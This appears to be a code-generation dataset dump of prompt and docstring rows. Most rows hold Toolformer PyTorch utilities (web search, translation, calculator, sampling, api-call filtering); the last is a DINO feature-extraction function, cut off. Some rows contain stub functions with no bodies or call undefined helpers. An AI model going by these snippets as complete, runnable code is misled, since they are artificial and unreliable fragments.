id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
161,691 | import os
class ColBERTv2:
    """Thin client for a remote ColBERTv2 retrieval endpoint."""

    def __init__(self, url: str):
        # base URL of the /api/search service
        self.url = url

    def __call__(self, query, k=10):
        """Return the text field of the top-k passages retrieved for `query`."""
        hits = colbertv2_get_request(self.url, query, k)
        return [hit['text'] for hit in hits]
def WikiSearch(
    input_query: str,
    url: str = 'http://ec2-44-228-128-229.us-west-2.compute.amazonaws.com:8893/api/search',
    k: int = 10
):
    """Retrieve the top-k wiki passages for `input_query` via a ColBERTv2 endpoint."""
    retriever = ColBERTv2(url)
    return retriever(input_query, k)
161,692 | import os
def MT(input_query: str, model_name: str = "facebook/nllb-200-distilled-600M"):
    """Machine-translate `input_query` into English with an NLLB seq2seq model."""
    tok = AutoTokenizer.from_pretrained(model_name)
    translator = AutoModelForSeq2SeqLM.from_pretrained(model_name)
    encoded = tok(input_query, return_tensors='pt')
    generated = translator.generate(
        **encoded,
        # force English as the decoding target language for NLLB
        forced_bos_token_id=tok.lang_code_to_id["eng_Latn"],
    )
    decoded = tok.batch_decode(generated, skip_special_tokens=True)
    return decoded[0]
161,693 | import os
def Calculator(input_query: str):
    """Recursively evaluate a simple infix arithmetic expression.

    Splits on the first '+', '-', '*' or '/' found (in that fixed order, so
    '+'/'-' bind looser than '*'/'/'), evaluates both sides recursively and
    rounds the result to 2 decimal places.

    Returns a float, or None when the input is not a recognizable expression.
    """
    # bug fix: the original referenced add/sub/mul/truediv without importing
    # them anywhere in this snippet (only `import os` was present)
    from operator import add, sub, mul, truediv
    operators = {
        '+': add,
        '-': sub,
        '*': mul,
        '/': truediv
    }
    if input_query.isdigit():
        return float(input_query)
    for symbol in operators.keys():
        left, operator, right = input_query.partition(symbol)
        if operator in operators:
            return round(operators[operator](Calculator(left), Calculator(right)), 2)
    # generalization: accept decimal literals (e.g. "1.5") that isdigit() misses;
    # previously these fell through and returned None, crashing the caller's round()
    try:
        return float(input_query)
    except ValueError:
        return None
161,694 | import os
def WolframAlphaCalculator(input_query: str):
    """Query Wolfram Alpha and return the first assumption and answer texts."""
    app_id = os.environ.get('WOLFRAM_ALPHA_APPID')
    client = wolframalpha.Client(app_id)
    result = client.query(input_query)
    # first pod is the interpreted assumption, first result pod is the answer
    assumption = next(result.pods).text
    answer = next(result.results).text
    return f'Assumption: {assumption} \nAnswer: {answer}'
161,695 | import os
def custom_search(query, api_key, cse_id, **kwargs):
    """Run one Google Custom Search query and return the raw result items."""
    search_service = build("customsearch", "v1", developerKey=api_key)
    response = search_service.cse().list(q=query, cx=cse_id, **kwargs).execute()
    return response['items']
def google_search(input_query: str, num_results: int = 10):
    """Google CSE search; returns a list of {'snippet', 'title', 'link'} dicts."""
    api_key = os.environ.get('GOOGLE_API_KEY')
    cse_id = os.environ.get('GOOGLE_CSE_ID')
    raw_items = custom_search(input_query, num=num_results, api_key=api_key, cse_id=cse_id)
    return [
        {
            "snippet": item["snippet"],
            "title": item["title"],
            "link": item["link"],
        }
        for item in raw_items
    ]
161,696 | import os
def _bing_search_results(
    search_term: str,
    bing_subscription_key: str,
    count: int,
    url: str = "https://api.bing.microsoft.com/v7.0/search"
):
    """Call the Bing web-search API and return the list of web-page hits."""
    query_params = {
        "q": search_term,
        "count": count,
        "textDecorations": True,
        "textFormat": "HTML",
    }
    response = requests.get(
        url,
        headers={"Ocp-Apim-Subscription-Key": bing_subscription_key},
        params=query_params,
    )
    response.raise_for_status()
    payload = response.json()
    return payload["webPages"]["value"]
def bing_search(
    input_query: str,
    num_results: int = 10
):
    """Bing web search; returns a list of {'snippet', 'title', 'link'} dicts."""
    subscription_key = os.environ.get("BING_API_KEY")
    pages = _bing_search_results(input_query, subscription_key, count=num_results)
    return [
        {
            "snippet": page["snippet"],
            "title": page["name"],
            "link": page["url"],
        }
        for page in pages
    ]
161,697 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def exists(val):
    """Return True unless `val` is None."""
    if val is None:
        return False
    return True
def default(val, d):
    """Return `val` when it is not None, otherwise fall back to `d`."""
    # inlined exists(): a plain identity check against None
    if val is None:
        return d
    return val
161,698 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def top_k(logits, thres = 0.9):
    """Keep only the top ceil((1 - thres) * vocab) logits per row.

    Every other position is filled with the most negative finite value of the
    logit dtype, so a subsequent softmax/sample effectively ignores it.
    Expects 2-d `logits` of shape (batch, num_tokens) (scatter_ uses dim 1).
    """
    # bug fix: this snippet's import block never imported `math`
    import math
    k = math.ceil((1 - thres) * logits.shape[-1])
    val, indices = torch.topk(logits, k)
    probs = torch.full_like(logits, -torch.finfo(logits.dtype).max)
    probs.scatter_(1, indices, val)
    return probs
161,699 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def num_matches(substr: str, text: str):
    """Count non-overlapping occurrences of the literal `substr` in `text`."""
    # escape so regex metacharacters in substr are matched literally
    pattern = re.compile(re.escape(substr))
    return sum(1 for _ in pattern.finditer(text))
161,700 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def create_function_regex(
    api_start = ' [',
    api_stop = ']'
):
    """Build a regex matching `<api_start>name(args)<api_stop>` tool invocations.

    Groups: 1 = opening tag + call, 2 = function name, 3 = raw argument string,
    4 = closing tag.
    """
    # bug fix: the body was missing in this snippet even though has_api_calls
    # calls this function; restored from the identical definition elsewhere in the file
    api_start_regex, api_stop_regex = map(re.escape, (api_start, api_stop))
    return rf'({api_start_regex}(\w+)\(([^)]*)\))({api_stop_regex})'

def has_api_calls(
    text,
    api_start = ' [',
    api_stop = ']'
):
    """Return True when `text` contains at least one api-call pattern."""
    regex = create_function_regex(api_start, api_stop)
    matches = re.findall(regex, text)
    return len(matches) > 0
161,701 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def create_function_regex(
    api_start = ' [',
    api_stop = ']'
):
    """Regex for `<api_start>name(args)<api_stop>`; groups: full call, name, args, closing tag."""
    start_pat = re.escape(api_start)
    stop_pat = re.escape(api_stop)
    return rf'({start_pat}(\w+)\(([^)]*)\))({stop_pat})'
def replace_all_but_first(
    text: str,
    api_start = ' [',
    api_stop = ']'
) -> str:
    """Strip every api-call match after the first one from `text`."""
    # inlined create_function_regex: same pattern it builds
    start_pat, stop_pat = map(re.escape, (api_start, api_stop))
    pattern = rf'({start_pat}(\w+)\(([^)]*)\))({stop_pat})'
    seen = 0

    def keep_only_first(match):
        nonlocal seen
        seen += 1
        # the first match survives untouched, every later one is removed
        return match.group(0) if seen == 1 else ''

    return re.sub(pattern, keep_only_first, text)
161,702 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def create_function_regex(
    api_start = ' [',
    api_stop = ']'
):
    """Return a regex with four groups: full call, function name, raw args, closing tag."""
    escaped = [re.escape(token) for token in (api_start, api_stop)]
    return r'({0}(\w+)\(([^)]*)\))({1})'.format(*escaped)
def invoke_tools(
    registry: dict[str, Callable],
    text: str,
    delimiter: str = '→',
    api_start = ' [',
    api_stop = ' ]'
) -> str:
    """Execute every api call found in `text`, splicing in results via `replace_fn`."""
    # NOTE(review): default api_stop here is ' ]' (leading space), unlike ']'
    # in the sibling helpers — confirm which is intended.
    pattern = create_function_regex(api_start, api_stop)
    substitute = partial(replace_fn, registry, delimiter = delimiter)
    return re.sub(pattern, substitute, text)
def invoke_tools_on_batch_sequences(
    registry: dict[str, Callable],
    token_ids: torch.Tensor,
    *,
    encode: Callable,
    decode: Callable,
    delimiter: str = '→',
    api_start = ' [',
    api_stop = ']'
) -> torch.Tensor:
    """Decode each token sequence, execute embedded api calls, and re-encode.

    Args:
        registry: tool name -> callable mapping used by invoke_tools.
        token_ids: (batch, seq) tensor of token ids.
        encode / decode: tokenizer round-trip functions (list of texts <-> tensor).
        delimiter: separator inserted between an api call and its response.
    """
    # bug fix: the original passed the undefined names `api_start_regex` /
    # `api_stop_regex`; the intended arguments are the raw delimiters.
    # (the computed regex is unused — invoke_tools builds its own — but kept for parity)
    regex = create_function_regex(api_start, api_stop)
    all_texts = [decode(one_seq_token_ids) for one_seq_token_ids in token_ids]
    invoke_tools_ = partial(invoke_tools, api_start = api_start, api_stop = api_stop)
    all_texts_with_api_calls = [invoke_tools_(registry, text, delimiter) for text in all_texts]
    return encode(all_texts_with_api_calls)
161,703 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def find_indices_of(t: torch.Tensor, token_id: int, occurrence = 1):
    """Per row, return the position just past the nth occurrence of `token_id`.

    Rows lacking n occurrences return the padded length (seq_len + 1), which
    callers use as a "no api call" sentinel.
    """
    assert occurrence > 0
    seen_so_far = (t == token_id).cumsum(dim = -1)
    # prepend a zero so the count is "occurrences strictly before this position"
    seen_so_far = F.pad(seen_so_far, (1, 0), value = 0.)
    before_nth = seen_so_far < occurrence
    return before_nth.sum(dim = -1).long()
def sample(
    model: nn.Module,
    *,
    seq_len,
    prime: Optional[torch.Tensor] = None,
    positions: Optional[torch.Tensor] = None,
    batch_size = 1,
    eos_token_id = None,
    sos_token_id = 1,
    temperature = 0.,
    pad_id = 0,
    call_api_only_once = False,
    api_start_token_id = None,
    auto_select_api_start_token_when_topk = False,
    select_api_start_id_top_k = 10,
):
    """Autoregressively sample out to `seq_len` tokens from `model`.

    Each batch row keeps its own write cursor (`positions`), so sequences
    primed to different lengths can be continued independently.

    Args:
        model: maps (batch, seq) token ids to (batch, seq, num_tokens) logits.
        seq_len: total length to sample out to.
        prime: optional (batch, prime_len) prompt; defaults to one <sos> column.
        positions: optional (batch,) per-row cursors; defaults to zeros.
        eos_token_id: when set, stop early once every row contains it and
            replace everything after <eos> with `pad_id`.
        call_api_only_once: mask the <api> logit in rows that already emitted it.
        auto_select_api_start_token_when_topk: force-pick the <api> token when it
            appears in the top `select_api_start_id_top_k` logits of a row
            that has not yet called the api.

    Returns:
        (batch, seq_len) tensor of sampled token ids.
    """
    device = next(model.parameters()).device
    max_seq_len = seq_len + 1  # one extra trailing column serves as a noop write target

    # validate
    if call_api_only_once:
        assert exists(api_start_token_id)

    # prime
    if exists(prime):
        batch_size, prime_length = prime.shape
    else:
        prime_length = 1
        prime = torch.full((batch_size, 1), sos_token_id, device = device, dtype = torch.long)

    prime = prime.to(device)

    # sampling positions - different sequences have different cursors
    if exists(positions):
        positions = positions.clone()
    else:
        positions = torch.zeros((batch_size,), device = device, dtype = torch.long)

    assert (positions <= (prime_length + 1)).all() and (positions <= max_seq_len).all(), 'all positions must be less then initial prime length as well as the total sequence length + 1 (plus one for noop if one sequence finished sampling before the other)'

    # eval model
    model.eval()

    # lengthen the prime to the entire sequence length
    remain_iterations = seq_len - prime_length
    output = F.pad(prime, (0, max_seq_len - prime_length), value = 0.)

    batch_indices = torch.arange(batch_size, device = device)
    batch_indices = rearrange(batch_indices, 'b -> b 1')
    position_indices = rearrange(positions, 'b -> b 1')

    # determine the <api> token mask, for making sure api is called only once, masking out logit to prevent it from being selected for those rows which already contains an <api> token
    api_token_mask = None # lazily created, since do not know logit dimensions

    def create_api_token_mask(num_tokens, api_start_token_id):
        # boolean (1, 1, num_tokens) mask that is True only at the <api> token id
        mask = torch.zeros((1, 1, num_tokens), dtype = torch.bool)
        assert api_start_token_id < num_tokens
        mask[..., api_start_token_id] = True
        return mask

    # start iterating
    for iteration in tqdm(range(remain_iterations)):
        logits = model(output)
        last_logits = logits[batch_indices, position_indices]  # logits at each row's cursor

        # this will ensure that each batch token sequence will have at most one <api> token
        if call_api_only_once:
            if not exists(api_token_mask):
                num_tokens = last_logits.shape[-1]
                api_token_mask = create_api_token_mask(num_tokens, api_start_token_id)
                api_token_mask = api_token_mask.to(device)

            api_called = (output == api_start_token_id).any(dim = -1)

            logit_mask = api_token_mask & rearrange(api_called, 'b -> b 1 1')
            last_logits = last_logits.masked_fill(logit_mask, -torch.finfo(last_logits.dtype).max)

        # greedy sample (but could be made non-greedy)
        sampled = gumbel_sample(last_logits, temperature = temperature)

        # for those sequences without an api call, if the api_start_token_id is within top k (set to 10 in paper) of logits, just auto-select
        # seems to be an important hack in the paper
        # it seems like this paper will take a lot more follow up research to be viable
        # NOTE(review): `api_called` is only assigned inside the call_api_only_once branch above;
        # enabling this flag without call_api_only_once would raise NameError — confirm intended usage.
        if auto_select_api_start_token_when_topk:
            top_token_ids = last_logits.topk(select_api_start_id_top_k, dim = -1).indices
            has_api_token_in_topk = (top_token_ids == api_start_token_id).any(dim = -1)
            should_auto_select_api_token = has_api_token_in_topk & ~rearrange(api_called, 'b -> b 1')

            sampled = sampled.masked_fill(should_auto_select_api_token, api_start_token_id)

        # set the sampled tokens at the right curosr positions
        output[batch_indices, position_indices] = sampled

        # increment positions
        position_indices += 1
        position_indices.clamp_(max = seq_len) # noop if one sequence is further along and near the end

        # if using <eos> tokens, look for all sequences having it and terminate, also anything after <eos> will be padded
        if exists(eos_token_id):
            eos_mask = (output == eos_token_id)

            all_rows_have_eos = eos_mask.any(dim = -1).all()

            if all_rows_have_eos:
                keep_mask = eos_mask.cumsum(dim = -1) == 0
                # NOTE(review): this pad widens keep_mask to max_seq_len + 1 columns while
                # `output` has max_seq_len — verify the masked_fill shapes actually line up.
                keep_mask = F.pad(keep_mask, (1, 0), value = True)
                output = output.masked_fill(~keep_mask, pad_id)
                break

    # remove the last token in output (use as noop placeholder)
    output = output[:, :-1]
    return output
def sample_with_api_call(
    model: nn.Module,
    *,
    seq_len,
    call_apis: Callable,
    prime: torch.Tensor,
    api_end_token_id: int,
    occurrence = 1,
    **kwargs
):
    """Two-pass sampling: sample, execute api calls, then resume after </api>."""
    first_pass = sample(
        model = model,
        prime = prime,
        seq_len = seq_len,
        **kwargs
    )

    # splice the actual api responses into the sampled sequences
    with_responses = call_apis(first_pass)

    total_len = with_responses.shape[-1]
    no_api_position = total_len  # handle sequences that do not have api calls

    after_api_pos = find_indices_of(
        with_responses,
        api_end_token_id,
        occurrence = occurrence
    )

    # second pass: continue generation starting right after the </api> token
    return sample(
        model = model,
        prime = with_responses,
        seq_len = total_len,
        positions = (after_api_pos + 1).clamp(max = no_api_position),
        **kwargs
    )
161,704 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def log(t, eps = 1e-20):
    """Numerically safe log: clamp below by `eps` before taking the log."""
    return torch.log(t.clamp(min = eps))
def all_contains_id(t: torch.Tensor, token_id: int):
    """True iff every row of `t` contains `token_id` at least once."""
    return (t == token_id).any(dim = -1).all()
def default_weight_fn(t):
    """Linearly decay from 1 by 0.2 per step, clamped at zero.

    Follows the formula in section 4.1 of the Toolformer paper (the w_s term
    in the denominator there is unclear); with this slope the weight reaches
    zero within 5 tokens.
    """
    decayed = 1. - 0.2 * t
    return decayed.clamp(min = 0.)
def get_pred_prob(token_ids, logits):
    """Probability the model assigned to each ground-truth next token.

    Aligns logits and targets: the logit at position i predicts token i + 1.
    Returns a (batch, seq - 1) tensor of probabilities.
    """
    shifted_logits = logits[:, :-1]   # drop the last position: nothing follows it
    next_token_ids = rearrange(token_ids[:, 1:], 'b n -> b n 1')  # drop the first token: nothing predicts it
    probs = shifted_logits.softmax(dim = -1)
    picked = probs.gather(-1, next_token_ids)
    return rearrange(picked, 'b n 1 -> b n')
def weight_and_mask(
    token_ids: torch.Tensor,
    token_id: int,
    pad_id = -1,
    weighting_fn: Callable = default_weight_fn
):
    """Per-token loss weights counted up from the first `token_id` occurrence.

    Positions marked `pad_id` by get_arange_start_at_token_id are zeroed out.
    """
    offsets = get_arange_start_at_token_id(token_ids, token_id, pad_id)
    weighted = weighting_fn(offsets)
    return weighted.masked_fill(offsets == pad_id, 0.)
# Result bundle produced by filter_tokens_with_api_response: counts of
# sequences that passed / failed the loss-based filter, the boolean mask and
# batch indices of the survivors, and the three token tensors (original
# passage, passage with api call but no response, passage with call and
# response) restricted to the surviving rows.
FilteredResults = namedtuple('FilteredResults', [
    'num_passed',
    'num_failed',
    'selected_indices',
    'selected_mask',
    'filtered_tokens',
    'filtered_tokens_without_api_response',
    'filtered_tokens_with_api_response'
])
def filter_tokens_with_api_response(
    model: nn.Module,                          # the language model should accept the token ids below and return the logits in shape (batch, seq, num tokens)
    *,
    tokens: torch.Tensor,                      # token ids (batch, seq) of the original passage, without api calls
    tokens_without_api_response: torch.Tensor, # token ids (batch, seq) of the passage, but with the api call (but without a response filled in) - <api>tool1(x, y)</api>
    tokens_with_api_response: torch.Tensor,    # token ids (batch, seq) of the passage with api call and the response - <api>tool1(x, y) → {response}</api>
    api_start_token_id: int,                   # token id of the <api> tag
    api_end_token_id: int,                     # token id of the </api> tag
    filter_threshold: float = 1.,              # the threshold at which to accept the sampled api call (tokens_with_api_response) for fine-tuning
    weighting_fn: Callable = default_weight_fn # weighting function
) -> FilteredResults:
    """Keep sampled api calls only when the api response lowers the LM loss.

    Implements the Toolformer filtering criterion: a row is selected when
    min(loss without api response, loss of original passage) minus the loss
    with the api response is at least `filter_threshold`, where each loss is
    a weighted negative log likelihood over the tokens following the call.
    """
    # validations
    assert all([*map(lambda t: t.dtype == torch.long, (tokens, tokens_with_api_response, tokens_without_api_response))])

    assert all_contains_id(tokens_without_api_response, api_start_token_id)
    assert all_contains_id(tokens_without_api_response, api_end_token_id)

    assert all_contains_id(tokens_with_api_response, api_start_token_id)
    assert all_contains_id(tokens_with_api_response, api_end_token_id)

    # auto set devices
    device = next(model.parameters()).device
    tokens, tokens_without_api_response, tokens_with_api_response = map(lambda t: t.to(device), (tokens, tokens_without_api_response, tokens_with_api_response))

    # get all the logits
    with torch.no_grad():
        model.eval()
        logits, logits_without_api_response, logits_with_api_response = map(model, (tokens, tokens_without_api_response, tokens_with_api_response))

    # derive all predicted prob of the actual next token id in sequence
    probs = get_pred_prob(tokens, logits)
    probs_without_api_response = get_pred_prob(tokens_without_api_response, logits_without_api_response)
    probs_with_api_response = get_pred_prob(tokens_with_api_response, logits_with_api_response)

    weight_and_mask_fn = partial(weight_and_mask, weighting_fn = weighting_fn)

    # derive the weighting
    # weights count up from the </api> token (weights only cover the tokens after the call)
    weight_without_api_response = weight_and_mask_fn(tokens_without_api_response[:, :-1], api_end_token_id)
    weight_with_api_response = weight_and_mask_fn(tokens_with_api_response[:, :-1], api_end_token_id)

    # deriving the weighting for the original passage is more tricky
    # would need to start counting up from <api> start token location
    # this would also assume that the language model perfectly copied the passage over and that both token ids are aligned except for the inserted API call - but this can be done with the custom filtering functions eventually
    weight = weight_and_mask_fn(tokens_without_api_response[:, 1:], api_start_token_id) # shift to the left by one since <api> does not exist in the original sequence
    weight = weight[:, :probs.shape[-1]]

    # get the loss L for all three types of sequences
    def loss_fn(weight, probs):
        # weighted negative log likelihood, summed over the sequence
        return (weight * -log(probs)).sum(dim = -1)

    loss = loss_fn(weight, probs)
    loss_without_api_response = loss_fn(weight_without_api_response, probs_without_api_response)
    loss_with_api_response = loss_fn(weight_with_api_response, probs_with_api_response)

    # calculate the main formula in the paper

    # loss+ = loss with api response
    # loss- = min(loss without api response, loss without api at all)

    loss_plus = loss_with_api_response
    loss_minus = torch.minimum(loss_without_api_response, loss)

    selected_mask = (loss_minus - loss_plus) >= filter_threshold

    # now we can select and return the entries that survived the filtering stage
    # also returning the selected indices of the batch being processed
    # for finetuning the model into toolformer

    batch = tokens.shape[0]
    indices = torch.arange(batch, device = tokens.device)

    selected_indices = indices[selected_mask]

    ret = FilteredResults(
        selected_mask.sum().item(),
        (~selected_mask).sum().item(),
        selected_indices,
        selected_mask,
        tokens[selected_mask],
        tokens_without_api_response[selected_mask],
        tokens_with_api_response[selected_mask]
    )

    return ret
161,705 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
def prompt_collate_fn(data, padding_value = 0):
    """Collate (prompt, length) pairs: pad prompts to a common length, stack lengths.

    Note pad_sequence is used with its default batch_first=False here, so the
    padded prompts come out sequence-first.
    """
    prompts, prompt_lengths = zip(*data)
    padded_prompts = pad_sequence(prompts, padding_value = padding_value)
    return padded_prompts, torch.stack(prompt_lengths)
def PromptDataloader(ds: Dataset, *args, padding_value = 0, **kwargs):
    """DataLoader over (prompt, length) pairs, padding prompts with `padding_value`.

    Binds the padding value into the module-level prompt_collate_fn (kept as a
    partial of a top-level function so it stays picklable for worker processes).
    """
    collate = partial(prompt_collate_fn, padding_value = padding_value)
    return DataLoader(ds, *args, collate_fn = collate, **kwargs)
161,706 | import re
from functools import partial, wraps
from collections import namedtuple
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torch.nn.utils.rnn import pad_sequence
from einops import rearrange, reduce
from toolformer_pytorch.palm import PaLM
from toolformer_pytorch.optimizer import get_optimizer
from toolformer_pytorch.prompts import DEFAULT_PROMPT_INPUT_TAG
from beartype import beartype
from beartype.typing import Callable, Optional, Union, List, Tuple
from tqdm import tqdm
from x_clip.tokenizer import tokenizer
# rebind so every pad_sequence call in this module is batch-first
pad_sequence = partial(pad_sequence, batch_first = True)

def FinetuneDataloader(ds: Dataset, *args, padding_value = 0, **kwargs):
    """DataLoader that right-pads variable-length token sequences into a batch-first tensor."""
    collate = partial(pad_sequence, padding_value = padding_value)
    return DataLoader(ds, *args, collate_fn = collate, **kwargs)
161,707 | from torch.optim import AdamW, Adam
def separate_weight_decayable_params(params):
    """Split parameters into (decayable, non-decayable) lists.

    1-d tensors (biases, norm gains) are excluded from weight decay.
    (bug fix: the body of this function was missing in this snippet even
    though get_optimizer below calls it; restored per that usage.)
    """
    wd_params, no_wd_params = [], []
    for param in params:
        # parameters with fewer than 2 dims should not be decayed
        param_list = no_wd_params if param.ndim < 2 else wd_params
        param_list.append(param)
    return wd_params, no_wd_params

def get_optimizer(
    params,
    lr = 1e-4,
    wd = 1e-2,
    betas = (0.9, 0.99),
    eps = 1e-8,
    filter_by_requires_grad = False,
    group_wd_params = True,
    **kwargs
):
    """Build an Adam/AdamW optimizer over `params`.

    Args:
        params: iterable of parameters (materialized to a list when filtering).
        lr, betas, eps: standard Adam hyperparameters.
        wd: weight decay; when 0 a plain Adam is returned.
        filter_by_requires_grad: drop parameters with requires_grad == False.
        group_wd_params: exclude 1-d parameters from weight decay via a
            second param group with weight_decay = 0.

    Returns:
        torch.optim.AdamW when wd > 0, else torch.optim.Adam.
    """
    has_weight_decay = wd > 0
    if filter_by_requires_grad:
        params = list(filter(lambda t: t.requires_grad, params))
    if group_wd_params and has_weight_decay:
        wd_params, no_wd_params = separate_weight_decayable_params(params)
        params = [
            {'params': wd_params},
            {'params': no_wd_params, 'weight_decay': 0},
        ]
    adam_kwargs = dict(lr = lr, betas = betas, eps = eps)
    if not has_weight_decay:
        return Adam(params, **adam_kwargs)
    return AdamW(params, weight_decay = wd, **adam_kwargs)
161,708 | import torch
from torch import nn, einsum
from einops import rearrange
from x_clip.tokenizer import tokenizer
def rotate_half(x):
    """Split the last dim into two halves (a, b) and return (-b, a) concatenated.

    Requires an even-sized last dimension.
    """
    pairs = rearrange(x, "... (j d) -> ... j d", j=2)
    first, second = pairs.unbind(dim=-2)
    return torch.cat((-second, first), dim=-1)
def apply_rotary_pos_emb(pos, t):
    """Standard rotary embedding: t * cos(pos) + rotate_half(t) * sin(pos)."""
    cos, sin = pos.cos(), pos.sin()
    return t * cos + rotate_half(t) * sin
161,709 | import os
import sys
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import datasets
from torchvision import transforms as pth_transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
def extract_features(model, data_loader, use_cuda=True, multiscale=False):
class ReturnIndexDataset(datasets.ImageFolder):
def __getitem__(self, idx):
def extract_feature_pipeline(args):
    """End-to-end DINO feature extraction for k-NN evaluation.

    Builds ImageNet-style train/val dataloaders from `args.data_path`, loads
    the requested backbone with pretrained weights, extracts features for both
    splits, L2-normalizes them (rank 0 only), optionally dumps everything to
    `args.dump_features`, and returns
    (train_features, test_features, train_labels, test_labels).

    NOTE(review): relies on `ReturnIndexDataset` and `extract_features`
    defined elsewhere in this module, and assumes torch.distributed has been
    initialized (DistributedSampler / rank queries).
    """
    # ============ preparing data ... ============
    transform = pth_transforms.Compose([
        pth_transforms.Resize(256, interpolation=3),  # interpolation=3 — presumably bicubic; confirm against the torchvision version in use
        pth_transforms.CenterCrop(224),
        pth_transforms.ToTensor(),
        pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    ])
    dataset_train = ReturnIndexDataset(os.path.join(args.data_path, "train"), transform=transform)
    dataset_val = ReturnIndexDataset(os.path.join(args.data_path, "val"), transform=transform)
    sampler = torch.utils.data.DistributedSampler(dataset_train, shuffle=False)
    data_loader_train = torch.utils.data.DataLoader(
        dataset_train,
        sampler=sampler,
        batch_size=args.batch_size_per_gpu,
        num_workers=args.num_workers,
        pin_memory=True,
        drop_last=False,
    )
    data_loader_val = torch.utils.data.DataLoader(
        dataset_val,
        batch_size=args.batch_size_per_gpu,
        num_workers=args.num_workers,
        pin_memory=True,
        drop_last=False,
    )
    print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.")

    # ============ building network ... ============
    if "vit" in args.arch:
        model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0)  # num_classes=0 -> no classification head, features only
        print(f"Model {args.arch} {args.patch_size}x{args.patch_size} built.")
    elif "xcit" in args.arch:
        model = torch.hub.load('facebookresearch/xcit:main', args.arch, num_classes=0)
    elif args.arch in torchvision_models.__dict__.keys():
        model = torchvision_models.__dict__[args.arch](num_classes=0)
        model.fc = nn.Identity()  # strip the classifier so forward() yields pooled features
    else:
        print(f"Architecture {args.arch} non supported")
        sys.exit(1)
    model.cuda()
    utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size)
    model.eval()

    # ============ extract features ... ============
    print("Extracting features for train set...")
    train_features = extract_features(model, data_loader_train, args.use_cuda)
    print("Extracting features for val set...")
